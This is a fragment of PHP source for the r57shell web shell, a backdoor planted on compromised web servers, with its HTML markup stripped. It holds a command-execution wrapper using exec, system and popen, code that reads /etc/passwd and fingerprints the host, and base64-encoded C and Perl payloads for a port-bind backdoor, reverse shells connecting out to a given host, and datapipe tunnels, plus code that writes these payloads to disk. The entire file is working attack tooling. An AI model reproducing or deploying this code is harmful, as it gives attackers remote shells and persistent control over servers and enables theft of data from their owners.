"; $table_up3 = ""; $arrow = " 4"; $lb = "["; $rb = "]"; $font = ""; $ts = "

"; $table_end1 = "

"; $te = "

"; $fs = ""; if(isset($_GET['users'])) { if(!$users=get_users()) { echo "".$lang[$language.'_text96'].""; } else { echo ''; foreach($users as $user) { echo $user."
"; } echo ''; } echo "

[ BACK ]

"; die(); } if (!empty($_POST['dir'])) { @chdir($_POST['dir']); } $dir = @getcwd(); $unix = 0; if(strlen($dir)>1 && $dir[1]==":") $unix=0; else $unix=1; if(empty($dir)) { $os = getenv('OS'); if(empty($os)){ $os = php_uname(); }

if(empty($os)){ $os ="-"; $unix=1; } else { if(@eregi("^win",$os)) { $unix = 0; } else { $unix = 1; } } } if(!empty($_POST['s_dir']) && !empty($_POST['s_text']) && !empty($_POST['cmd']) && $_POST['cmd'] == "search_text") { echo $head; if(!empty($_POST['s_mask']) && !empty($_POST['m'])) { $sr = new SearchResult($_POST['s_dir'],$_POST['s_text'],$_POST['s_mask']); } else { $sr = new SearchResult($_POST['s_dir'],$_POST['s_text']); } $sr->SearchText(0,0); $res = $sr->GetResultFiles(); $found = $sr->GetMatchesCount(); $titles = $sr->GetTitles(); $r = ""; if($found > 0) { $r .= ""; foreach($res as $file=>$v) { $r .= ""; $r .= ""; foreach($v as $a=>$b) { $r .= ""; $r .= ""; $r .= ""; $r .= "\n"; } } $r .= "

".ws(3); $r .= (!$unix)? str_replace("/","\\",$file) : $file; $r .= ""; $r .= "
".$a."	".ws(2).$b."

"; echo $r; } else { echo "

".$lang[$language.'_text56']."

"; } echo "

[ BACK ]

"; die(); } if(!$safe_mode && strpos(ex("echo abcr57"),"r57")!=3) { $safe_mode = 1; } $SERVER_SOFTWARE = getenv('SERVER_SOFTWARE'); if(empty($SERVER_SOFTWARE)){ $SERVER_SOFTWARE = "-"; } function ws($i) { return @str_repeat(" ",$i); } function ex($cfe)

{ $res = ''; if (!empty($cfe)) { if(function_exists('exec')) { @exec($cfe,$res); $res = join("\n",$res); } elseif(function_exists('shell_exec')) { $res = @shell_exec($cfe); } elseif(function_exists('system')) { @ob_start(); @system($cfe); $res = @ob_get_contents(); @ob_end_clean(); } elseif(function_exists('passthru')) { @ob_start(); @passthru($cfe); $res = @ob_get_contents(); @ob_end_clean(); } elseif(@is_resource($f = @popen($cfe,"r"))) { $res = ""; while(!@feof($f)) { $res .= @fread($f,1024); } @pclose($f); } } return $res; } function get_users() { $users = array(); $rows=file('/etc/passwd'); if(!$rows) return 0; foreach ($rows as $string) { $user = @explode(":",$string); if(substr($string,0,1)!='#') array_push($users,$user[0]); } return $users; } function err($n,$txt='') { echo '

'; echo $GLOBALS['lang'][$GLOBALS['language'].'_err'.$n]; if(!empty($txt)) { echo " $txt"; } echo '

'; return null; } function perms($mode)

{ if (!$GLOBALS['unix']) return 0; if( $mode & 0x1000 ) { $type='p'; } else if( $mode & 0x2000 ) { $type='c'; } else if( $mode & 0x4000 ) { $type='d'; } else if( $mode & 0x6000 ) { $type='b'; } else if( $mode & 0x8000 ) { $type='-'; } else if( $mode & 0xA000 ) { $type='l'; } else if( $mode & 0xC000 ) { $type='s'; } else $type='u'; $owner["read"] = ($mode & 00400) ? 'r' : '-'; $owner["write"] = ($mode & 00200) ? 'w' : '-'; $owner["execute"] = ($mode & 00100) ? 'x' : '-'; $group["read"] = ($mode & 00040) ? 'r' : '-'; $group["write"] = ($mode & 00020) ? 'w' : '-'; $group["execute"] = ($mode & 00010) ? 'x' : '-'; $world["read"] = ($mode & 00004) ? 'r' : '-'; $world["write"] = ($mode & 00002) ? 'w' : '-'; $world["execute"] = ($mode & 00001) ? 'x' : '-'; if( $mode & 0x800 ) $owner["execute"] = ($owner['execute']=='x') ? 's' : 'S'; if( $mode & 0x400 ) $group["execute"] = ($group['execute']=='x') ? 's' : 'S'; if( $mode & 0x200 ) $world["execute"] = ($world['execute']=='x') ? 't' : 'T'; $s=sprintf("%1s", $type); $s.=sprintf("%1s%1s%1s", $owner['read'], $owner['write'], $owner['execute']); $s.=sprintf("%1s%1s%1s", $group['read'], $group['write'], $group['execute']); $s.=sprintf("%1s%1s%1s", $world['read'], $world['write'], $world['execute']); return trim($s); } function in($type,$name,$size,$value,$checked=0) { $ret = ""; } function which($pr) { $path = ex("which $pr"); if(!empty($path)) { return $path; } else { return $pr; } } function cf($fname,$text) { $w_file=@fopen($fname,"w") or err(0); if($w_file) { @fputs($w_file,@base64_decode($text)); @fclose($w_file); } } function sr($l,$t1,$t2) { return "".$t1."".$t2.""; } if (!@function_exists("view_size")) { function view_size($size)

{ if($size >= 1073741824) {$size = @round($size / 1073741824 * 100) / 100 . " GB";} elseif($size >= 1048576) {$size = @round($size / 1048576 * 100) / 100 . " MB";} elseif($size >= 1024) {$size = @round($size / 1024 * 100) / 100 . " KB";} else {$size = $size . " B";} return $size;

} }

function DirFilesR($dir,$types='') { $files = Array(); if(($handle = @opendir($dir))) { while (false !== ($file = @readdir($handle))) { if ($file != "." && $file != "..") { if(@is_dir($dir."/".$file)) $files = @array_merge($files,DirFilesR($dir."/".$file,$types)); else { $pos = @strrpos($file,"."); $ext = @substr($file,$pos,@strlen($file)-$pos); if($types) { if(@in_array($ext,explode(';',$types))) $files[] = $dir."/".$file; } else $files[] = $dir."/".$file; } } } @closedir($handle); } return $files; } class SearchResult { var $text; var $FilesToSearch; var $ResultFiles; var $FilesTotal; var $MatchesCount; var $FileMatschesCount; var $TimeStart; var $TimeTotal; var $titles; function SearchResult($dir,$text,$filter='') { $dirs = @explode(";",$dir); $this->FilesToSearch = Array(); for($a=0;$aFilesToSearch = @array_merge($this>FilesToSearch,DirFilesR($dirs[$a],$filter)); $this->text = $text; $this->FilesTotal = @count($this->FilesToSearch); $this->TimeStart = getmicrotime();

$this->MatchesCount = 0; $this->ResultFiles = Array(); $this->FileMatchesCount = Array(); $this->titles = Array();

} function GetFilesTotal() { return $this->FilesTotal; } function GetTitles() { return $this->titles; } function GetTimeTotal() { return $this->TimeTotal; } function GetMatchesCount() { return $this->MatchesCount; } function GetFileMatchesCount() { return $this->FileMatchesCount; } function GetResultFiles() { return $this->ResultFiles; } function SearchText($phrase=0,$case=0) { $qq = @explode(' ',$this->text); $delim = '|'; if($phrase) foreach($qq as $k=>$v) $qq[$k] = '\b'.$v.'\b'; $words = '('.@implode($delim,$qq).')'; $pattern = "/".$words."/"; if(!$case) $pattern .= 'i'; foreach($this->FilesToSearch as $k=>$filename) { $this->FileMatchesCount[$filename] = 0; $FileStrings = @file($filename) or @next; for($a=0;$a<@count($FileStrings);$a++) { $count = 0; $CurString = $FileStrings[$a]; $CurString = @Trim($CurString); $CurString = @strip_tags($CurString); $aa = ''; if(($count = @preg_match_all($pattern,$CurString,$aa))) { $CurString = @preg_replace($pattern,"<SPAN style='color: #990000;'>\\1",$CurString); $this->ResultFiles[$filename][$a+1] = $CurString; $this->MatchesCount += $count; $this->FileMatchesCount[$filename] += $count; } } } $this->TimeTotal = @round(getmicrotime() - $this->TimeStart,4); } } function getmicrotime() { list($usec,$sec) = @explode(" ",@microtime()); return ((float)$usec + (float)$sec); } $port_bind_bd_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3RyaW5nLmg+DQojaW5jbHVkZ SA8c3lzL3R5cGVzLmg+DQojaW5jbHVkZS A8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCiNpbmNsdWRlIDxlcnJuby5oPg0K aW50IG1haW4oYXJnYyxhcmd2KQ0KaW50I GFyZ2M7DQpjaGFyICoqYXJndjsNCnsgIA0KIGludCBzb2NrZmQsIG5ld2ZkOw0KIGNoYXIgYnVmWzMwXTs NCiBzdHJ1Y3Qgc29ja2FkZHJfaW4gcmVt b3RlOw0KIGlmKGZvcmsoKSA9PSAwKSB7IA0KIHJlbW90ZS5zaW5fZmFtaWx5ID0gQUZfSU5FVDsNCiByZW 1vdGUuc2luX3BvcnQgPSBodG9ucyhhdG9

pKGFyZ3ZbMV0pKTsNCiByZW1vdGUuc2luX2FkZHIuc19hZGRyID0gaHRvbmwoSU5BRERSX0FOWSk7IA0KI HNvY2tmZCA9IHNvY2tldChBRl9JTkVULF NPQ0tfU1RSRUFNLDApOw0KIGlmKCFzb2NrZmQpIHBlcnJvcigic29ja2V0IGVycm9yIik7DQogYmluZChz b2NrZmQsIChzdHJ1Y3Qgc29ja2FkZHIgK ikmcmVtb3RlLCAweDEwKTsNCiBsaXN0ZW4oc29ja2ZkLCA1KTsNCiB3aGlsZSgxKQ0KICB7DQogICBuZXd mZD1hY2NlcHQoc29ja2ZkLDAsMCk7DQog ICBkdXAyKG5ld2ZkLDApOw0KICAgZHVwMihuZXdmZCwxKTsNCiAgIGR1cDIobmV3ZmQsMik7DQogICB3cm l0ZShuZXdmZCwiUGFzc3dvcmQ6IiwxMCk 7DQogICByZWFkKG5ld2ZkLGJ1ZixzaXplb2YoYnVmKSk7DQogICBpZiAoIWNocGFzcyhhcmd2WzJdLGJ1Z ikpDQogICBzeXN0ZW0oImVjaG8gd2VsY2 9tZSB0byByNTcgc2hlbGwgJiYgL2Jpbi9iYXNoIC1pIik7DQogICBlbHNlDQogICBmcHJpbnRmKHN0ZGVy ciwiU29ycnkiKTsNCiAgIGNsb3NlKG5ld 2ZkKTsNCiAgfQ0KIH0NCn0NCmludCBjaHBhc3MoY2hhciAqYmFzZSwgY2hhciAqZW50ZXJlZCkgew0KaW5 0IGk7DQpmb3IoaT0wO2k8c3RybGVuKGVu dGVyZWQpO2krKykgDQp7DQppZihlbnRlcmVkW2ldID09ICdcbicpDQplbnRlcmVkW2ldID0gJ1wwJzsgDQ ppZihlbnRlcmVkW2ldID09ICdccicpDQp lbnRlcmVkW2ldID0gJ1wwJzsNCn0NCmlmICghc3RyY21wKGJhc2UsZW50ZXJlZCkpDQpyZXR1cm4gMDsNC n0="; $port_bind_bd_pl="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vYmFzaCAtaSI7DQppZiAoQEFS R1YgPCAxKSB7IGV4aXQoMSk7IH0NCiRMS VNURU5fUE9SVD0kQVJHVlswXTsNCnVzZSBTb2NrZXQ7DQokcHJvdG9jb2w9Z2V0cHJvdG9ieW5hbWUoJ3R jcCcpOw0Kc29ja2V0KFMsJlBGX0lORVQs JlNPQ0tfU1RSRUFNLCRwcm90b2NvbCkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2 Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVV TRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJExJU1RFTl9QT1JULElOQUREUl9BTlkpKSB8fCBka WUgIkNhbnQgb3BlbiBwb3J0XG4iOw0KbG lzdGVuKFMsMykgfHwgZGllICJDYW50IGxpc3RlbiBwb3J0XG4iOw0Kd2hpbGUoMSkNCnsNCmFjY2VwdChD T05OLFMpOw0KaWYoISgkcGlkPWZvcmspK Q0Kew0KZGllICJDYW5ub3QgZm9yayIgaWYgKCFkZWZpbmVkICRwaWQpOw0Kb3BlbiBTVERJTiwiPCZDT05 OIjsNCm9wZW4gU1RET1VULCI+JkNPTk4i Ow0Kb3BlbiBTVERFUlIsIj4mQ09OTiI7DQpleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudC BleGVjdXRlICRTSEVMTFxuIjsNCmNsb3N lIENPTk47DQpleGl0IDA7DQp9DQp9"; $back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3R lbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVl sxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZ HIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NL X1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik 7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3 RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw=="; $back_connect_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY 2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludC BtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pDQp7DQogaW50IGZkOw0KIHN0cnVjdCBzb2NrYWRkcl9p biBzaW47DQogY2hhciBybXNbMjFdPSJyb SAtZiAiOyANCiBkYWVtb24oMSwwKTsNCiBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogc2luLnNpbl9 wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJd KSk7DQogc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsgDQogYnplcm8oYXJndl sxXSxzdHJsZW4oYXJndlsxXSkrMStzdHJ sZW4oYXJndlsyXSkpOyANCiBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ 1ApIDsgDQogaWYgKChjb25uZWN0KGZkLC Aoc3RydWN0IHNvY2thZGRyICopICZzaW4sIHNpemVvZihzdHJ1Y3Qgc29ja2FkZHIpKSk8MCkgew0KICAg cGVycm9yKCJbLV0gY29ubmVjdCgpIik7D

QogICBleGl0KDApOw0KIH0NCiBzdHJjYXQocm1zLCBhcmd2WzBdKTsNCiBzeXN0ZW0ocm1zKTsgIA0KIGR 1cDIoZmQsIDApOw0KIGR1cDIoZmQsIDEp Ow0KIGR1cDIoZmQsIDIpOw0KIGV4ZWNsKCIvYmluL3NoIiwic2ggLWkiLCBOVUxMKTsNCiBjbG9zZShmZC k7IA0KfQ=="; $datapipe_c="I2luY2x1ZGUgPHN5cy90eXBlcy5oPg0KI2luY2x1ZGUgPHN5cy9zb2NrZXQuaD4NCiNpb mNsdWRlIDxzeXMvd2FpdC5oPg0KI2luY2 x1ZGUgPG5ldGluZXQvaW4uaD4NCiNpbmNsdWRlIDxzdGRpby5oPg0KI2luY2x1ZGUgPHN0ZGxpYi5oPg0K I2luY2x1ZGUgPGVycm5vLmg+DQojaW5jb HVkZSA8dW5pc3RkLmg+DQojaW5jbHVkZSA8bmV0ZGIuaD4NCiNpbmNsdWRlIDxsaW51eC90aW1lLmg+DQo jaWZkZWYgU1RSRVJST1INCmV4dGVybiBj aGFyICpzeXNfZXJybGlzdFtdOw0KZXh0ZXJuIGludCBzeXNfbmVycjsNCmNoYXIgKnVuZGVmID0gIlVuZG VmaW5lZCBlcnJvciI7DQpjaGFyICpzdHJ lcnJvcihlcnJvcikgIA0KaW50IGVycm9yOyAgDQp7IA0KaWYgKGVycm9yID4gc3lzX25lcnIpDQpyZXR1c m4gdW5kZWY7DQpyZXR1cm4gc3lzX2Vycm xpc3RbZXJyb3JdOw0KfQ0KI2VuZGlmDQoNCm1haW4oYXJnYywgYXJndikgIA0KICBpbnQgYXJnYzsgIA0K ICBjaGFyICoqYXJndjsgIA0KeyANCiAga W50IGxzb2NrLCBjc29jaywgb3NvY2s7DQogIEZJTEUgKmNmaWxlOw0KICBjaGFyIGJ1Zls0MDk2XTsNCiA gc3RydWN0IHNvY2thZGRyX2luIGxhZGRy LCBjYWRkciwgb2FkZHI7DQogIGludCBjYWRkcmxlbiA9IHNpemVvZihjYWRkcik7DQogIGZkX3NldCBmZH NyLCBmZHNlOw0KICBzdHJ1Y3QgaG9zdGV udCAqaDsNCiAgc3RydWN0IHNlcnZlbnQgKnM7DQogIGludCBuYnl0Ow0KICB1bnNpZ25lZCBsb25nIGE7D QogIHVuc2lnbmVkIHNob3J0IG9wb3J0Ow 0KDQogIGlmIChhcmdjICE9IDQpIHsNCiAgICBmcHJpbnRmKHN0ZGVyciwiVXNhZ2U6ICVzIGxvY2FscG9y dCByZW1vdGVwb3J0IHJlbW90ZWhvc3Rcb iIsYXJndlswXSk7DQogICAgcmV0dXJuIDMwOw0KICB9DQogIGEgPSBpbmV0X2FkZHIoYXJndlszXSk7DQo gIGlmICghKGggPSBnZXRob3N0YnluYW1l KGFyZ3ZbM10pKSAmJg0KICAgICAgIShoID0gZ2V0aG9zdGJ5YWRkcigmYSwgNCwgQUZfSU5FVCkpKSB7DQ ogICAgcGVycm9yKGFyZ3ZbM10pOw0KICA gIHJldHVybiAyNTsNCiAgfQ0KICBvcG9ydCA9IGF0b2woYXJndlsyXSk7DQogIGxhZGRyLnNpbl9wb3J0I D0gaHRvbnMoKHVuc2lnbmVkIHNob3J0KS hhdG9sKGFyZ3ZbMV0pKSk7DQogIGlmICgobHNvY2sgPSBzb2NrZXQoUEZfSU5FVCwgU09DS19TVFJFQU0s IElQUFJPVE9fVENQKSkgPT0gLTEpIHsNC iAgICBwZXJyb3IoInNvY2tldCIpOw0KICAgIHJldHVybiAyMDsNCiAgfQ0KICBsYWRkci5zaW5fZmFtaWx 5ID0gaHRvbnMoQUZfSU5FVCk7DQogIGxh ZGRyLnNpbl9hZGRyLnNfYWRkciA9IGh0b25sKDApOw0KICBpZiAoYmluZChsc29jaywgJmxhZGRyLCBzaX plb2YobGFkZHIpKSkgew0KICAgIHBlcnJ vcigiYmluZCIpOw0KICAgIHJldHVybiAyMDsNCiAgfQ0KICBpZiAobGlzdGVuKGxzb2NrLCAxKSkgew0KI CAgIHBlcnJvcigibGlzdGVuIik7DQogIC AgcmV0dXJuIDIwOw0KICB9DQogIGlmICgobmJ5dCA9IGZvcmsoKSkgPT0gLTEpIHsNCiAgICBwZXJyb3Io ImZvcmsiKTsNCiAgICByZXR1cm4gMjA7D QogIH0NCiAgaWYgKG5ieXQgPiAwKQ0KICAgIHJldHVybiAwOw0KICBzZXRzaWQoKTsNCiAgd2hpbGUgKCh jc29jayA9IGFjY2VwdChsc29jaywgJmNh ZGRyLCAmY2FkZHJsZW4pKSAhPSAtMSkgew0KICAgIGNmaWxlID0gZmRvcGVuKGNzb2NrLCJyKyIpOw0KIC AgIGlmICgobmJ5dCA9IGZvcmsoKSkgPT0 gLTEpIHsNCiAgICAgIGZwcmludGYoY2ZpbGUsICI1MDAgZm9yazogJXNcbiIsIHN0cmVycm9yKGVycm5vK Sk7DQogICAgICBzaHV0ZG93bihjc29jay wyKTsNCiAgICAgIGZjbG9zZShjZmlsZSk7DQogICAgICBjb250aW51ZTsNCiAgICB9DQogICAgaWYgKG5i eXQgPT0gMCkNCiAgICAgIGdvdG8gZ290c 29jazsNCiAgICBmY2xvc2UoY2ZpbGUpOw0KICAgIHdoaWxlICh3YWl0cGlkKC0xLCBOVUxMLCBXTk9IQU5 HKSA+IDApOw0KICB9DQogIHJldHVybiAy MDsNCg0KIGdvdHNvY2s6DQogIGlmICgob3NvY2sgPSBzb2NrZXQoUEZfSU5FVCwgU09DS19TVFJFQU0sIE lQUFJPVE9fVENQKSkgPT0gLTEpIHsNCiA gICBmcHJpbnRmKGNmaWxlLCAiNTAwIHNvY2tldDogJXNcbiIsIHN0cmVycm9yKGVycm5vKSk7DQogICAgZ 290byBxdWl0MTsNCiAgfQ0KICBvYWRkci 5zaW5fZmFtaWx5ID0gaC0+aF9hZGRydHlwZTsNCiAgb2FkZHIuc2luX3BvcnQgPSBodG9ucyhvcG9ydCk7 DQogIG1lbWNweSgmb2FkZHIuc2luX2FkZ HIsIGgtPmhfYWRkciwgaC0+aF9sZW5ndGgpOw0KICBpZiAoY29ubmVjdChvc29jaywgJm9hZGRyLCBzaXp lb2Yob2FkZHIpKSkgew0KICAgIGZwcmlu

dGYoY2ZpbGUsICI1MDAgY29ubmVjdDogJXNcbiIsIHN0cmVycm9yKGVycm5vKSk7DQogICAgZ290byBxdW l0MTsNCiAgfQ0KICB3aGlsZSAoMSkgew0 KICAgIEZEX1pFUk8oJmZkc3IpOw0KICAgIEZEX1pFUk8oJmZkc2UpOw0KICAgIEZEX1NFVChjc29jaywmZ mRzcik7DQogICAgRkRfU0VUKGNzb2NrLC ZmZHNlKTsNCiAgICBGRF9TRVQob3NvY2ssJmZkc3IpOw0KICAgIEZEX1NFVChvc29jaywmZmRzZSk7DQog ICAgaWYgKHNlbGVjdCgyMCwgJmZkc3IsI E5VTEwsICZmZHNlLCBOVUxMKSA9PSAtMSkgew0KICAgICAgZnByaW50ZihjZmlsZSwgIjUwMCBzZWxlY3Q 6ICVzXG4iLCBzdHJlcnJvcihlcnJubykp Ow0KICAgICAgZ290byBxdWl0MjsNCiAgICB9DQogICAgaWYgKEZEX0lTU0VUKGNzb2NrLCZmZHNyKSB8fC BGRF9JU1NFVChjc29jaywmZmRzZSkpIHs NCiAgICAgIGlmICgobmJ5dCA9IHJlYWQoY3NvY2ssYnVmLDQwOTYpKSA8PSAwKQ0KCWdvdG8gcXVpdDI7D QogICAgICBpZiAoKHdyaXRlKG9zb2NrLG J1ZixuYnl0KSkgPD0gMCkNCglnb3RvIHF1aXQyOw0KICAgIH0gZWxzZSBpZiAoRkRfSVNTRVQob3NvY2ss JmZkc3IpIHx8IEZEX0lTU0VUKG9zb2NrL CZmZHNlKSkgew0KICAgICAgaWYgKChuYnl0ID0gcmVhZChvc29jayxidWYsNDA5NikpIDw9IDApDQoJZ29 0byBxdWl0MjsNCiAgICAgIGlmICgod3Jp dGUoY3NvY2ssYnVmLG5ieXQpKSA8PSAwKQ0KCWdvdG8gcXVpdDI7DQogICAgfQ0KICB9DQoNCiBxdWl0Mj oNCiAgc2h1dGRvd24ob3NvY2ssMik7DQo gIGNsb3NlKG9zb2NrKTsNCiBxdWl0MToNCiAgZmZsdXNoKGNmaWxlKTsNCiAgc2h1dGRvd24oY3NvY2ssM ik7DQogcXVpdDA6DQogIGZjbG9zZShjZm lsZSk7DQogIHJldHVybiAwOw0KfQ=="; $datapipe_pl="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgSU86OlNvY2tldDsNCnVzZSBQT1NJWDsNCiRsb2Nh bHBvcnQgPSAkQVJHVlswXTsNCiRob3N0I CAgICAgPSAkQVJHVlsxXTsNCiRwb3J0ICAgICAgPSAkQVJHVlsyXTsNCiRkYWVtb249MTsNCiRESVIgPSB 1bmRlZjsNCiR8ID0gMTsNCmlmICgkZGFl bW9uKXsgJHBpZCA9IGZvcms7IGV4aXQgaWYgJHBpZDsgZGllICIkISIgdW5sZXNzIGRlZmluZWQoJHBpZC k7IFBPU0lYOjpzZXRzaWQoKSBvciBkaWU gIiQhIjsgfQ0KJW8gPSAoJ3BvcnQnID0+ICRsb2NhbHBvcnQsJ3RvcG9ydCcgPT4gJHBvcnQsJ3RvaG9zd CcgPT4gJGhvc3QpOw0KJGFoID0gSU86Ol NvY2tldDo6SU5FVC0+bmV3KCdMb2NhbFBvcnQnID0+ICRsb2NhbHBvcnQsJ1JldXNlJyA9PiAxLCdMaXN0 ZW4nID0+IDEwKSB8fCBkaWUgIiQhIjsNC iRTSUd7J0NITEQnfSA9ICdJR05PUkUnOw0KJG51bSA9IDA7DQp3aGlsZSAoMSkgeyANCiRjaCA9ICRhaC0 +YWNjZXB0KCk7IGlmICghJGNoKSB7IHBy aW50IFNUREVSUiAiJCFcbiI7IG5leHQ7IH0NCisrJG51bTsNCiRwaWQgPSBmb3JrKCk7DQppZiAoIWRlZm luZWQoJHBpZCkpIHsgcHJpbnQgU1RERVJ SICIkIVxuIjsgfSANCmVsc2lmICgkcGlkID09IDApIHsgJGFoLT5jbG9zZSgpOyBSdW4oXCVvLCAkY2gsI CRudW0pOyB9IA0KZWxzZSB7ICRjaC0+Y2 xvc2UoKTsgfQ0KfQ0Kc3ViIFJ1biB7DQpteSgkbywgJGNoLCAkbnVtKSA9IEBfOw0KbXkgJHRoID0gSU86 OlNvY2tldDo6SU5FVC0+bmV3KCdQZWVyQ WRkcicgPT4gJG8tPnsndG9ob3N0J30sJ1BlZXJQb3J0JyA9PiAkby0+eyd0b3BvcnQnfSk7DQppZiAoISR 0aCkgeyBleGl0IDA7IH0NCm15ICRmaDsN CmlmICgkby0+eydkaXInfSkgeyAkZmggPSBTeW1ib2w6OmdlbnN5bSgpOyBvcGVuKCRmaCwgIj4kby0+ey dkaXInfS90dW5uZWwkbnVtLmxvZyIpIG9 yIGRpZSAiJCEiOyB9DQokY2gtPmF1dG9mbHVzaCgpOw0KJHRoLT5hdXRvZmx1c2goKTsNCndoaWxlICgkY 2ggfHwgJHRoKSB7DQpteSAkcmluID0gIi I7DQp2ZWMoJHJpbiwgZmlsZW5vKCRjaCksIDEpID0gMSBpZiAkY2g7DQp2ZWMoJHJpbiwgZmlsZW5vKCR0 aCksIDEpID0gMSBpZiAkdGg7DQpteSgkc m91dCwgJGVvdXQpOw0Kc2VsZWN0KCRyb3V0ID0gJHJpbiwgdW5kZWYsICRlb3V0ID0gJHJpbiwgMTIwKTs NCmlmICghJHJvdXQgICYmICAhJGVvdXQp IHt9DQpteSAkY2J1ZmZlciA9ICIiOw0KbXkgJHRidWZmZXIgPSAiIjsNCmlmICgkY2ggJiYgKHZlYygkZW 91dCwgZmlsZW5vKCRjaCksIDEpIHx8IHZ lYygkcm91dCwgZmlsZW5vKCRjaCksIDEpKSkgew0KbXkgJHJlc3VsdCA9IHN5c3JlYWQoJGNoLCAkdGJ1Z mZlciwgMTAyNCk7DQppZiAoIWRlZmluZW QoJHJlc3VsdCkpIHsNCnByaW50IFNUREVSUiAiJCFcbiI7DQpleGl0IDA7DQp9DQppZiAoJHJlc3VsdCA9 PSAwKSB7IGV4aXQgMDsgfQ0KfQ0KaWYgK CR0aCAgJiYgICh2ZWMoJGVvdXQsIGZpbGVubygkdGgpLCAxKSAgfHwgdmVjKCRyb3V0LCBmaWxlbm8oJHR oKSwgMSkpKSB7DQpteSAkcmVzdWx0ID0g c3lzcmVhZCgkdGgsICRjYnVmZmVyLCAxMDI0KTsNCmlmICghZGVmaW5lZCgkcmVzdWx0KSkgeyBwcmludC

BTVERFUlIgIiQhXG4iOyBleGl0IDA7IH0 NCmlmICgkcmVzdWx0ID09IDApIHtleGl0IDA7fQ0KfQ0KaWYgKCRmaCAgJiYgICR0YnVmZmVyKSB7KHBya W50ICRmaCAkdGJ1ZmZlcik7fQ0Kd2hpbG UgKG15ICRsZW4gPSBsZW5ndGgoJHRidWZmZXIpKSB7DQpteSAkcmVzID0gc3lzd3JpdGUoJHRoLCAkdGJ1 ZmZlciwgJGxlbik7DQppZiAoJHJlcyA+I DApIHskdGJ1ZmZlciA9IHN1YnN0cigkdGJ1ZmZlciwgJHJlcyk7fSANCmVsc2Uge3ByaW50IFNUREVSUiA iJCFcbiI7fQ0KfQ0Kd2hpbGUgKG15ICRs ZW4gPSBsZW5ndGgoJGNidWZmZXIpKSB7DQpteSAkcmVzID0gc3lzd3JpdGUoJGNoLCAkY2J1ZmZlciwgJG xlbik7DQppZiAoJHJlcyA+IDApIHskY2J 1ZmZlciA9IHN1YnN0cigkY2J1ZmZlciwgJHJlcyk7fSANCmVsc2Uge3ByaW50IFNUREVSUiAiJCFcbiI7f Q0KfX19DQo="; if($unix) { if(!isset($_COOKIE['uname'])) { $uname = ex('uname -a'); setcookie('uname',$uname); } else { $uname = $_COOKIE['uname']; } if(!isset($_COOKIE['id'])) { $id = ex('id'); setcookie('id',$id); } else { $id = $_COOKIE['id']; } if($safe_mode) { $sysctl = '-'; } else if(isset($_COOKIE['sysctl'])) { $sysctl = $_COOKIE['sysctl']; } else { $sysctl = ex('sysctl -n kern.ostype && sysctl -n kern.osrelease'); if(empty($sysctl)) { $sysctl = ex('sysctl -n kernel.ostype && sysctl -n kernel.osrelease'); } if(empty($sysctl)) { $sysctl = '-'; } setcookie('sysctl',$sysctl); } } echo $head; echo ''; if(empty($_POST['cmd'])) { $serv = array(127,192,172,10); $addr=@explode('.', $_SERVER['SERVER_ADDR']); $current_version = str_replace('.','',$version); if (!in_array($addr[0], $serv)) { @print ""; @readfile ("http://127.0.0.1/r57shell_version/version.php?version=".$current_version."");}} echo '

'.ws(2).'N'.ws(2).'SnIpEr_SA

'; echo ws(2)."".date ("d-m-Y H:i:s").""; echo ws(2).$lb." phpinfo ".$rb; echo ws(2).$lb." php.ini ".$rb; if($unix) { echo ws(2).$lb." cpu ".$rb; echo ws(2).$lb." mem ".$rb; echo ws(2).$lb." users ".$rb; }

echo ws(2).$lb." tmp ".$rb; echo ws(2).$lb." delete ".$rb."
